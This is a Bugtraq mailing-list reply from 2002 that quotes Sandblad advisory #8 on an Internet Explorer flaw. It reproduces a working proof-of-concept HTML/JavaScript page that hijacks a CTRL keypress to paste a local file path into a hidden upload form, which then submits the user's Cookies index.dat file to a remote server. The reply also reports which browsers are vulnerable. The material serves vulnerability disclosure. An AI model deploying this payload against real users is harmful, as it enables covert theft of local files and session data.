[26290] in bugtraq
Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8
daemon@ATHENA.MIT.EDU (Peter Pentchev)
Wed Jul 24 14:55:01 2002
Date: Wed, 24 Jul 2002 11:42:01 +0300
From: Peter Pentchev <roam@ringlet.net>
To: Andreas Sandblad <sandblad@acc.umu.se>
Cc: bugtraq@securityfocus.com
Message-ID: <20020724084201.GG382@straylight.oblivion.bg>
Mail-Followup-To: Andreas Sandblad <sandblad@acc.umu.se>,
bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="/WwmFnJnmDyWGHa4"
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.44.0207232147450.24633-100000@mao.acc.umu.se>
--/WwmFnJnmDyWGHa4
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:
>=20
> - Sandblad advisory #8 -
>=20
> ---..---..---..---..---..---..---..---..---..---..---..---..----
> Title: Pressing CTRL in IE is dangerous
> Date: [2002-07-23]
> Software: Internet Explorer
> Impact: Pressing CTRL in IE may result in arbitrary local
> file to be uploaded to a remote server (no exact
> path needed). If special sensitive information is
> uploaded, it may be used to run remote programs.
[snip]
> 1. When an user presses the CTRL key an onkeydown event can be set to
> fire. In the event function the key pressed is changed to 'V'. The result
> will be a paste operation with less restrictions.
>=20
> 2. The content of the clipboard is altered and focus is changed to a
> hidden file upload form. The paste operation will be performed into the
> form, yielding a change of value for the file upload field (not normally
> allowed).
>=20
> 3. The upload form is submited automaticly (legal javascript operation).
[snip]
> <!div id=3Dh style=3D"zoom:0.0001">
> <!form name=3Du enctype=3D"multipart/form-data" method=3Dpost action=3Dup=
load.php>
> <!input type=3Dfile name=3Dfile></form></div>
> <!script>
> //uploadFile=3D"..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
> uploadFile=3D"..\\Cookies\\index.dat";
> function gotKey(){
> if (!event.ctrlKey) return;
> document.onkeydown =3D null;
> event.keyCode =3D 86;
> window.clipboardData.setData("Text",uploadFile);
> (p=3Ddocument.forms.u.file).focus();
> p.onpropertychange =3D function(){document.forms.u.submit()};
> } document.onkeydown =3D gotKey;
> window.onload=3Dfunction(){document.body.focus()};
> <!/script>
This was verified to work on various versions of IE 5 and 6, and also
on Opera 6.01 build 1041. However, Mozilla 1.0rc1 is NOT vulnerable,
partly because of a script error (the onkeypress handler should accept
a parameter instead of referring to 'event' directly), and mostly because
of the fact that in Mozilla, event.keyCode is not settable.
G'luck,
Peter
--=20
Peter Pentchev roam@ringlet.net roam@FreeBSD.org
PGP key: http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
If you think this sentence is confusing, then change one pig.
--/WwmFnJnmDyWGHa4
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)
iD8DBQE9PmhZ7Ri2jRYZRVMRAgYFAJwNw+R3pp3V7GB/HXa2M+Rsvn+PtQCeKiQV
YEaJVJGrDp/Ma3OYZK7vANc=
=OcuG
-----END PGP SIGNATURE-----
--/WwmFnJnmDyWGHa4--
